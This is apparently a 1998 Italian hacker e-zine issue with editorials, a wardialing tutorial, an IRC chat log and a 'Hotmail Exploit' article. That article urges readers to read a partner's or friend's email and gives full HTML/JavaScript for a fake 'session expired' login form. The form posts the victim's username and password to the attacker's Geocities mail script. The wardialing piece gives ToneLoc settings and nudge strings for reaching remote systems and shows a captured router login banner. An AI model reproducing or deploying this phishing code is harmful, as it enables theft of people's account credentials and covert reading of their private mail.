Copy Link
Add to Bookmark
Report

Under Construction 01

eZine's profile picture
Published in 
Under Construction
 · 5 years ago

  

ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ þ UnDeR CoNsTrUcTiOn þ [Nø0001] ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ >>>>>>>>>>>>>>>>>>>>>>> UnDeR CoNsTrUcTiOn MeMbErS <<<<<<<<<<<<<<<<<<<<<< ³
ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´
³ madsem, UncleScan, TrUsA, Li-Nux, Nullmind, NightWolf, Chatr0bot, NegMan ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ

ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ HACKING --- PHREAKING --- VIRII --- CRACKING --- IRCWAR --- WAREZ --- MP3 ³
ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´
³ Ci trovate su IRCnet #phreak.it !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! ³
³ La scena italiana si capovolge con un nuovo gruppo underground ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ

þ Eccocci qui, finalmente con il numero 1 di Under Construction, tutti noi
ne siamo fieri, io personalmente, non immagginate quanto :)
In questo numero io, Li-Nux, faro' da redattore lasciando pero' tutte le
note di madsem del numero zero, che non Š disponibile al pubblico.

ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ DiScLaImEr: ³
ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´
³ Ricordiamo che qualsiasi applicazione illegale non e' approvata dalla ³
³ UnDeR CoNsTrUcTiOn, tali informazioni vengono divulgate per proteggerci ³
³ da eventuali truffe, non per crearne, comunque il gruppo non si assume ³
³ nessuna responsabilita' sulle applicazioni illecite che possono essere ³
³ realizzate .... Noi diffondiamo cultura, non illegalita' ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ

ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ MeNuZz [UnDeR CoNsTrUcTiOn] --- Articoli ³
ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´
³ ³
³ þ 1] Editoriale Nø1 >>>>>>>>>>>>>>>>>>> UncleScan ³
³ þ 2] Editoriale Nø2 >>>>>>>>>>>>>>>>>>> madsem ³
³ þ 3] Hotmail Exploit >>>>>>>>>>>>>>>>>>> NullMind ³
³ þ 4] Siamo o non siamo Scannisti >>>>>>>>>>>>>>>>>>> NegMan ³
³ þ 5] Log del canale #phreak.it >>>>>>>>>>>>>>>>>>> ChatR0bot ³
³ þ 6] Cellular Tips & Tricks & News >>>>>>>>>>>>>>>>>>> ChatR0bot ³
³ þ 7] Identificare, Attaccare, >>>>>>>>>>>>>> ³
³ Eliminare ed Eludere la >>>> NightWolf ³
³ Sicurezza Fisica ed i Sistemi >>>> ³
³ di Rilevamento Intrusione >>>>>>>>>>>>>> ³
³ þ 8] Indice Nø1 TJ LOD/H >>>>>>>>>>>>>>>>>>> NightWolf ³
³ þ 9] Custom Local Area Signalling Services >>>>>>>>>>>>>>>>>>> NightWolf ³
³ þ 10] Applicazioni malsane del Back Orifice >>>>>>>>>>>>>>>>>>> TrUsA ³
³ þ 11] NonSoloPhreakin' >>>>>>>>>>>>>>>>>>> ChatR0bot ³
³ þ 12] Vecchi server... servono... >>>>>>>>>>>>>>>>>>> Li-Nux ³
³ þ 13] CaSiNo... vi fara' tremare >>>>>>>>>>>>>>>>>>> Li-Nux ³
³ þ 14] Disinfettazione di un file infetto >>>>>>>>>>>>>>>>>>> Li-Nux ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ þ [EDITORIALE 22/09/1998] UnDeR CoNsTrUcTiOn ³
³ [MaStEr SeCtIoN] :) Articolo di: UncleScan ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ

"Punto di riferimento", non credo ci possano essere definizioni piu'
appropriate, per il gruppo di U.C., che solo da poche setimane sta
ampliando la rete di collaboratori e semplici curiosi.

U.C. , non vuole essere la solita congrega di amiconi telematici, che si
gestisce in modo casereccio e alle volte penalmente rilevante gli ultimi
trucchetti di phreak, o ancor di piu' , che mira a crakkare qualche sito
"OFF LIMITS" per poi sventagliare ai quattro venti ,la lamerata di turno,
o amenita' simili : ). Ma, il vero spirito , quello filosofico,
motivazionale, quello che in ultima analisi, permette di essere
riconosciuti, e' quello esclusivamente di portare l'informazione ad ogni
livello, consentendo all'utente medio, al neofita, o al tipo + tosto di
trovare valido, dialogo, eventualmente, valido punto di partenza, per
meglio ampliare studi, e ricerche o in enmbrione o in itinere, scoraggiando
fin d'ora, persone che usino accortezze di svariato tipo per commettere
reati, od ancora piu' detestabile, danneggiare sistemi, con cui persone
traggono il sostentamento da tali risorse!

Entrando nel Cybermondo, si possono trovare sicuramente siti o
pubblicazioni, che potranno essere + interessanti, o migliori delle nostre,
e lo sappiamo, ma ora come ora ci stiamo mettendo tutto l'impegno perche'
questa e-zine sia pubblicata con contenuti che possano essere apprezzabili,
e credetemi , le pubblicazioni e gli articoli contenuti, sono interessanti,
perche' comunque provengono da personaggi preparati e molto umili, che sono
sempre disposti a mettere in discussione le loro convinzioni ed i loro
studi.

Alla prossima ..... E-ZiNe nø2

UncleScan
(Zio Scanno x gli amici ;))

ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ þ [EDITORIALE Nø2 22/09/1998] UnDeR CoNsTrUcTiOn ³
³ [MaStEr SeCtIoN] :) Articolo di: madsem ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ

20.30 del 22/09/1998 ke vita sciacquina ....
Da oggi cominciano a cambiare un po' di cose ... tra poco esce il numero
zero (uno NdR) di UnDeR CoNsTrUcTiOn , la nostra e-zine ... io da oggi
kambio la mia vita ... forse e' finita la mia ennesima storia d'amore ...
almeno il pc non mi tradisce ... e' finita la birra ... almeno non mi
distraggo ... sono finite le sigarette ... almeno qui' dentro si respira ...
scrivo la presentazione al numero zero (uno cazzo NdR :) e non penso piu'
a nulla ...

UnDeR CoNsTrUcTiOn e' nata un mese fa' ...
Da quel giorno e' nata una strettissima collaborazione tra tutti gli amici
di #underc, una piccola cosa di cui andare fieri infatti noi siamo fieri di
quello che siamo, dei semplici ragazzacci che se ne raccontano di tutti i
colori, degli amici di cui fidarsi, delle persone come Trusa, in perenne
azione, come UncleScan, sempre disponibile con i suoi piccoli aiuti,
NightWolf, che tra poco si mettera' a programmare anche gli accendini (non
credo che sia lontano il giorno in cui dira' che ha creato un virus che fa'
spegnere gli accendini !!!!!), come NullMind, il nostro angelo custode, come
Li-Nux , traduce piu' velocemente del traduttore della IBM !!!, come NegMan,
sicuramente uno dei migliori scanner in italia, e come Chatrobot, sempre con
le sue gogliardate , e come The_Crazy , non si sa' mai se e' vivo o no.
Ognuno di noi ha fatto la sua parte, ha scritto, ha spiegato, ha cercato,
ha elaborato. RAGAZZI: ABBIAMO CREATO QUALCOSA INSIEME PARTENDO DAL NULLA !!!

Grazie, grazie a tutti, siamo nati sotto una buona stella
(Ne sono convinto NdR :)

Vostro, madsem. (Sei mitico !!! NdR :)


ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ þ [HotMail Exploit 22/09/1998] UnDeR CoNsTrUcTiOn ³
³ [HaCkInG SeCtIoN] :) Articolo di: NullMind ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ

Vi e' mai capitato di voler leggere l'email della vostra ragazza o del
vostro amico a cui volete fare da tanto un piccolo scherzetto? Bene, se lui
ha un account su HotMail avete alcune possibilita' di riuscirci, basta
sapere un po' di codice Java ... L'unica cosa che dovete fare e' mandare un
email che contiene del codice java al povero malcapitato. Quando l'utente
leggera' le sue email lo scriptino in java contenuto in una di quelle
forzera' l'utente a rifare il login. Cosi' l'user, la password e l'indirizzo
ip della vittima vi verranno trasmesse sulla vostra casella di posta
elettronica. Non usate la vostra vera e-mail, fatevi un account su Geocities
se volete usarlo... ma questo e' inutile dirlo, vero ?! ;)

adesso una parte dello scriptino in java da salvare come messages.htm (la
linea 17 include il nostro user name su Geocities, in questo caso [ybwc]) :


<html><head></head><body>
<p>"Go where you want today" - Blue Adept</p>
<script>
function getmess(){
return "<table border=0 cellpadding=5 cellspacing=5 width=508 height=90%>" +
"<tr valign=middle>" +
"<th colspan=2>" +
"<font face=\"Arial, Helvetica\" size=\"5\">" +
"We're Sorry, We Cannot<br>Process Your Request" +
"</font></th></tr>" +
"<tr valign=middle><td align=center>" +
"<font face=\"Arial, Helvetica\" size=\"3\">Reason: </font>" +
"<font face=\"Arial, Helvetica\" size=\"3\" color=\"#ff0000\"><b>Time expired. Please re-login.</b></font><br>" +
"<font face=\"Arial, Helvetica\" size=\"2\"><a href=\"http://www.hotmail.com/errormsg.html\">(Get more info regarding error
messages here)</a></font>"
+
"</td></tr>" +
"<tr valign=\"middle\"><td align=\"center\">" +
"<FORM METHOD=POST ACTION=\"http://www.geocities.com/cgi-bin/homestead/mail.pl?ybwc\" target=\"_top\">" +
"<INPUT TYPE=\"hidden\" NAME=\"next-url\" VALUE=\"http://www.hotmail.com\">" +
"<INPUT TYPE=\"hidden\" NAME=\"subject\" VALUE=\"Hotmail Password\">" +
"<table cellpadding=\"0\" cellspacing=\"5\" border=\"0\">" +
"<tr><td><font face=\"Arial, Helvetica\" size=\"2\">Login Name:</font><br><input type=\"text\" name=\"login\" size=\"16\"
maxlength=\"
16\"></td><td><font face=\"Arial, Helvetica\" size=\"2\">Password:</font><br><input type=\"password\" name=\"passwd\"
size=\"
16\" maxlength=\"16\"> <input type=\"submit\" value=\"Enter\"></td><tr>" +
"</table></form></td></tr>" +
"<tr valign=middle><th colspan=2 align=center>" +
"<font face=\"Arial, Helvetica\" size=\"3\">" +
"Return to <a href=\"http://welcome.to/www.hotmail.com\" target=\"_parent\">Hotmail's Homepage</a>." +
"</font></th></tr></table>" +
"<p><img src=\"http://209.1.112.251/c9698.gif\" width=189 height=16 border=0 alt=\"Copyright 1996-1997\">";
}
nomenulinks=top.submenu.document.links.length;
for(i=0;i<nomenulinks-1;i++){
top.submenu.document.links[i].target="work";
top.submenu.document.links[i].href="javascript:getmess()";
}
noworklinks=top.work.document.links.length;
for(i=0;i<noworklinks-1;i++){
top.work.document.links[i].target="work";
top.work.document.links[i].href="javascript:getmess()";
}
</script>
</body>
</html>

a questo punto salvate il tutto come messages.htm e inserite il file nella e-mail da mandare alla vostra vittima
ad es. pirla@hotmail.com e aspettate che lo script faccia il resto... troverete user, password e ip nella vostra
casella di posta.
Semplice no ;)

E adesso per la gioia della controparte un piccolo fix per impedire che qualcuno prenda possesso dei vostri dati:
disabilitate javascript del vostro browser.
Se state usando Netscape andate in edit poi in preferences, advanced, disable javascript.
Se invece (ahime') state usando Microsoft Internet Explorer andate in view, poi in internet options, security, custom settings,
scripting, disable active scripting.

Ciao a tutti dalla Under Construction

P.s. Si accettano critiche e non... ;)

nullmind@freemail.it

>> null , sei un grande !!! <<
>> .... ora e' il momento di un bel articolo di negman !!!<<

ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ þ [Siamo o non siamo scannisti 22/09/1998] UnDeR CoNsTrUcTiOn ³
³ [PhEaKiNg SeCtIoN] :) Articolo di: NegMan ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
________________________________________________________________
| |
| |
| DISCLAIMER: Tutte le info descritte in questo articolo hanno |
| uno scopo puramente informativo. |
| L'autore declina da ogni responsabilita' per |
| eventuali danni a cose o a persone causati |
| dall'utilizzo improprio di tali info. |
| |
| NeGMaN |
|________________________________________________________________|



PREMESSA: Questo articolo e' stato scritto secondo l'etica che
UnDeR CoStRuCtIoN si e'prefissata di seguire, ossia
la possibilita' di far avvicinare all'underground
digitale tutti coloro che ne fossero interessati,
senza creare nessun tipo di barriera.

REMEMBER: LA CONOSCENZA E' DI TUTTI


Hi boy, dopo lunghe ore di mIRCate, mi sono deciso a scrivere
qualcosina sul WaRdIaLiNg.

La prima volta che ho sentito qualcosa del genere e' stato nel
1983, con l'uscita del film War Games. Il protagonista del film
non faceva altro che far chiamare al proprio computer una miriade
di numeri telefonici con la speranza di riuscire a beccare il numero
di una famosa software-house, per potersi scaricare dei demo.

Logicamente quello era solo un film, ma proprio grazie a quel film
che in Italia si inizio' a parlare di wardialing. Infatti ricordo che
proprio in quegli anni parti' in Italia la commercializzazione dei
computer da parte della Commodore (VIC20 e C64), e successivamente
la vendita dell' Adattore Telematico 6499 a 300 baud.

Cosi' anche in Italia si inizio' a fare del Wardialing con dei
programmini autoprodotti che si riuscivano a trovare in qualche
rarissima bbs. E' immininente pensare che a quei tempi il wardialing
era anche associato a qualche truffa che si compieva ai danni della SIP.
Mentre invece con la nascita dei green (167 per intenderci), le cose
sono un po' cambiate. Bisogna certo dire che come al solito l'Italia e'
un paese che dorme un po' troppo, in quanto negli USA i cosidetti numeri
non-charge fecero la comparsa circa 10 anni prima....:))


In Italia, con la diffusione dei gr33n, il wardialing ha trovato terreno
fertile e oggi si possono trovare in rete tantissimi programmi che
permettono ai nostri computer di scannare per interi giorni.
Io personalmente ho una predilizione per il ToneLoc, un prg molto
flessibile e facilmente adattabile a qualsiaisi situazione.


TONELOC

La prima cosa da fare sarbbe quella di stampare (una volta scompattato il
file TL110.zip) i file tl-user.doc e tl-ref.doc , file importantissimi
per capire il perfetto funzionamento del ToneLoc.

Si passa poi alla configurazione del prg, attraverso il file tlcfg.exe
Tralasciando le configurazioni standard del programma (Modem, Init String,
Com, etc.), mi soffermerei soprattutto sul menu' ScanOptions il quale
presenta alcune voci importantissime:

- Between-call-Delay : si va ad inserire il tempo in millisecondi che il
ToneLoc aspetta prima di effettuare un' altra
chiamata.

Questo valore e' molto importante perche' permette di adattare
il ToneLoc ai diversi modem, anche quelli piu' datati. Infatti
con quest'ultimi un valore >600 va piu' che bene.

- Wait Delay : Il valore che andremo ad inserire qui ci permette di
stabilire per quanto tempo (in millisecondi) il Toneloc
aspettera', una volta ricevuto un carrier o un tone ,
prima di riagganciare e passare alla prossima chiamata.

Anche qui e' consigliabile immettere un valore >30000 se si
vuole effettuare uno scanning approfondito, oppure per un
lavoro piu' veloce un 20000 andrebbe benissimo.


- Scan For : Se volete ciullare quello che vi interessa maggiormente
settate questo valore ad 1 :))

- Nudge String : Ci permette di stabilire la stringa che il ns computer
mandera' al momento della connessione ad un computer
remoto.

Questo forse e' il settaggio piu' importante del TonLoc
per ottenere i migliori risultati.

Ci sono alcuni computer che una volta chiamati, aspettano
l'invio di alcuni caratteri per poter poi rispondere.
Con questa stringa andremo a settare quei caratteri da sendare
al computer remoto, per poi avere una risposta.

Ricordate che se non viene sendato il carattere o i caratteri
esatti, il computer remoto non vi rispondera' mai, e nel file
di log trovere una situazione simile:

08-Mar-97 13:48:51 167xxxxxx C: CONNECT 57600

<*CARRIER LOST (11 sec.)*>

Come si vede in questo esempio la connessione e' stata persa
dopo 11 secondi proprio perche' la stringa sendata dal ns
computer non e' stata accettata dal computer remoto.

In questo caso allora il lavoro diventa' piu' difficile poiche'
bisogna fare diversi tentativi per scoprire "cosa" attende il
computer remoto per attivare la connessione.


In quest'altro esempio si puo' notare invece come il computer remoto
ha attivato la connessione utilizzando questa stringa:

Nudge String: ~~|||~~

~ mezzo secondo di ritardo prima di sendare il
resto della stringa
| senda un [ENTER] al pc remoto



10-Mar-97 16:14:04 16701xxxx C: CONNECT 57600


_________________/\___ __ __ __ __ __
_________________/\___ / /_ / /_ / / / /|/|
_________________/\___ / /_ /_ /_ /_ /_/ / /
_________________/\_________________________
ITALIA

----------------------------------------------
| |\
| CISCO 2504 | |
| Cliente: Christian Dior | |
| Sede: PISA | |
| by LT | |
---------------------------------------------- |
\_____________________________________________\|



!!!! ATTENZIONE: Ogni accesso non autorizzato e' proibito !!!!
!!!! WARNING: Unauthorized access is prohibited !!!!



User Access Verification

Username:



C'e' pero' da considerare che non e' sempre cosi' facile, che un computer
ci risponda accettando un semplice [ENTER].
Nella maggior parte dei casi bisogna invece sendare diversi caratteri
prima che la connessione sia attivata.



ALCUNI ESEMPI DI NUDGE STRING


Nudge String: ~~\\~~|

Nudge String: ~~~...~~~|

Nudge String: ~~^q~~



Come si puo' notare ci vuole un po' di "fantasia" e il GIOCO e' fatto !!!!!

-----------------------------------------------------------------------------

CONSIDERAZIONI SULLA LEGALITA' DEL WARDIALING

Sulla legalita' o meno del wardialing, ci sono da fare diverse
considerazioni:

- da un punto di vista tecnico, nessuna legge vieta la possibilita'
di poter chiamare 1000 numeri al giorno, ne tantomeno la telekom lo puo'
impedire. Questo quindi dovrebbe valere anche per i gr33n i quali sono
dei numeri che la telekozz pubblica annualmente, quindi niente
di riservato.
Un consiglio, andatevi a spulciare per bene quel manualetto che vi
arriva insieme agli elenchi telefonici su tutti i green attivati
dalle aziende......ci possono essere delle gradite sorprese...:)))

- Ricordiamoci che pero' l'azienda che gestisce la rete fissa telefonica
e' la TeleZozz, nota per la sua taccagine e per il suo motto:
" Inculare il prossimo ". Quindi penso che se da qualche tabulato esce
fuori un utente che abbia fatto circa 10.000 chiamate a numeri verdi
nell'arco di un mese, bene, PENSO che la TelePorc certamente non sta' li
a guardare.

- Si potrebbe pero' ANCHE pensare (forse per rincuorarci) che con tutti i
casini che TeleKorn ha in casa sua, non si va ad incasinare ancor di piu'
cercando di dare la caccia alle streghe. Tranne se pero' forse
non si va' ad "attaccare" qualche SUO gr33n.........quindi state molto
attenti !!!!


" ragazzo non avevi mai capito, che si poteva essere un vero
fuorilegge senza neanche uscire dalla tua camera ? "


[Bruce Sterling " Giro di vite contro gli hacker " 1993 Shake]


Buon WaRdIaLiNg !!!!!


NeGMaN

>> rimangono sottointesi i vari risvolti ... OKKIO !!!!!<<
>> passiamo alle leggende cyber ... un articolo dedicato a madhatt !!!!!<<

ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ þ [Log del canale #phreak.it 22/09/1998] UnDeR CoNsTrUcTiOn ³
³ [LaMeR SeCtIoN] :) Articolo di: ChatR0bot ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ

Questo e' il log del chat con un lamer con il quale mi sono spacciato da
"Warez - Greenz BOT" un po' tecnologicamente avanzato... leggete e ridete!

#phreak.it buffer saved on Tue Sep 08 07:58:27 1998
*** Now talking in #phreak.it
*** Daed3luS is now known as D4eDaeluS
*** Anti-S (AntiS@a-kl1-61.tin.it) has joined #phreak.it
<Anti-S> ciao
<ChatRobot> ciao
*** madsem (~madsem@c-to5-160.tin.it) has joined #phreak.it
<madsem> ciao a tutti !!!!
<ChatRobot> ueh mad!
<madsem> /msg m0rg4na op mads
<ChatRobot> :)))))))))))))))))))))))))))))))))))))))))))))))
<madsem> kazzo di javairc !!!!!
<madsem> tutto bene ?
<ChatRobot> abbastanza
<ChatRobot> tranne che morgana non mi oppa, non so perche'
<madsem> sapete del takeover ke abbiamo fatto ?
<ChatRobot> #umbria?
<madsem> non sono a kasa ... non posso resettarla ....
<madsem> #udine
<ChatRobot> ah si
<madsem> ehehehehehehehehe !!!!!!
<ChatRobot> vediamo come va su #roma
*** M0rg4nj sets mode: +o madsem
<ChatRobot> ah no che scemo!
<ChatRobot> e' chiaro che non mi oppa
-M0rg4nj- Access denied.
<ChatRobot> chiamo dall'altro provider!
-M0rg4nj- Added hostmask: *!ChatRobot@194.177.107.*
*** M0rg4nj sets mode: +o ChatRobot
<ChatRobot> Brava morgana, sei una figona :)
<madsem> null e' un guru !!!

Qui entra il nostro soggetto: MADHATT! e Tillu, il nostro bot, lo banna
subito perche' e' gia' un lamer noto nel canale...

*** madhatt (~ak.madhat@ppp-cesena86-122.iol.it) has joined
#phreak.it
*** Tillu sets mode: +b madhatt!*@*
*** madhatt was kicked by Tillu (banned: requestÏ)
<ChatRobot> uh...
*** Retrieving #phreak.it channel info...
*** ChatRobot sets mode: -b madhatt!*@*
<ChatRobot> vediamo
*** Blum (Blum@195.223.184.250) has joined #phreak.it

Qui inizio a provocarlo... madsem e' un complice ovviamente...

-> *madhatt* De-Banned now
*** madhatt (~ak.madhat@ppp-cesena86-122.iol.it) has joined
#phreak.it
*** ChatRobot sets mode: -o Tillu
*** M0rg4nj sets mode: +o Tillu
*** D4eDaeluS sets mode: +o Tillu
<madhatt> chi a messo su chat robot ?
<madsem> e' un bot in prova
<madhatt> e'e' approvatelo!
<madhatt> allora io ho un green
<madhatt> ma non so come farlo funzionare!
<ChatRobot> No GrReEnS PlEaSe!
<madsem> io ne ho un elenko telefonico ......
<madhatt> perche?
<madhatt> che strano bot
<madhatt> parla!
<madhatt> ????
<madhatt> mai visto un bot cosi'
*** M0rg4nj is now known as M0rg4na
<madsem> te l'ho detto ke e' in prova ... e' un nostro progetto .....
<madhatt> pero' avete ragione a metterlo in prova
<madsem> riconosce le parole in kanaletta
<madhatt> perche in un canale di phreaking se non parli di green
<ChatRobot> No GrReEnS PlEaSe!
<madhatt> di che parli ?
<madsem> e' antipula ...
<madhatt> green green green green green
<ChatRobot> Are U LaMeR?!
<madhatt> no
<madhatt> and you ?
<madsem> io penso di si'
<madhatt> non hai un bel pensiero
<madsem> ehehehehehehehehehe !
<madhatt> poi che parole dice sto bot ?
<madhatt> cosa sa dire ?
<madsem> dipende da quello ke scrivi ....
<madsem> guarda :
<madsem> hacking
<madsem> e lui :
<ChatRobot> Good Thing DUDE!
<madhatt> cracking
<madsem> oppure :
<ChatRobot> Good Thing DUDE!
<madhatt> pula!
<ChatRobot> Fuck0ff!!!
<madhatt> Mad Hatters
<madsem> lamer
<ChatRobot> Mothafucker
<madhatt> <ChaRobot> Is number one!
<madsem> ti piace ?
<madhatt> bello!
<madhatt> poi e finito ?
<madsem> ho dei problemi con la shell ....
<madsem> okkupa circa 80 mb ....
<madhatt> mettici Mad Hatters = e' il numero uno! ok ?
<madsem> vuoi vedere una kosa karina ?????
<madhatt> si
<madhatt> bsta che non mi banni
<madhatt> e non mi kikki
<madsem> underconstruction
<madsem> e lui :
<ChatRobot> UnDeRcOnStRuCtIoN?!?!?!
<ChatRobot> UnDeRcOnStRuCtIoN?!?!?!
<ChatRobot> UnDeRcOnStRuCtIoN RuLeZ!
<madhatt> questo e l'ultimo ?
<madsem> nono
<madsem> guarda :
<madsem> madsem
<ChatRobot> The Best Boy all arount the world :)
<madhatt> baa
<madsem> figo vero ?
<madhatt> i bot dovrebbero andare anche loro a scuola!
<madsem> ehehehehehehehehehe !!!! e i lamer ???
<madhatt> i lamer
<madhatt> dovrebbero sparire!
<madsem> allora ke ci fai ankora qua ?????? ;-)))))
<madhatt> molto spiritoso
<madsem> fa' anke da server come arkivio warez ....
<madhatt> ascolta oppami
<madsem> prova a kollegarti in dccchat
<madhatt> nel bot
<madhatt> con il bot ????
<madsem> yep
<madhatt> DCC Chat connection established
<madhatt> <ChatRobot> Ready

A questo punto madhatt e Blum chattano con me in DCC, vedete alla fine del
file...

<madhatt> che gli dico?
<madhatt> yes ???
<madhatt> o si
<madsem> dovrebbe darti il prompt dei komandi
<madhatt> no
<madhatt> se fermato
<madsem> ?????
<madsem> strano
<madhatt> ma perche non l'hai fatto in italiano ?
<madhatt> uffa :-(
<madhatt> adesso sto antipatico pure ai bot!
<madhatt> :-((((
<madsem> essendo legato alla lod non posso farlo in italiano ....
<madsem> ha il riconoscimento automatiko dei loozers !!!!
<madsem> prova a scrivere help
<madhatt> aspett
<madhatt> forse devo scrivere .help !!!
<madhatt> No help available, insert password firs
<madhatt> t
<madsem> loggati
<madhatt> cioe?
<madhatt> cosa vuol dire loggati ?
* ChatRobot has detected 2 lamers in #phreak.it !!!
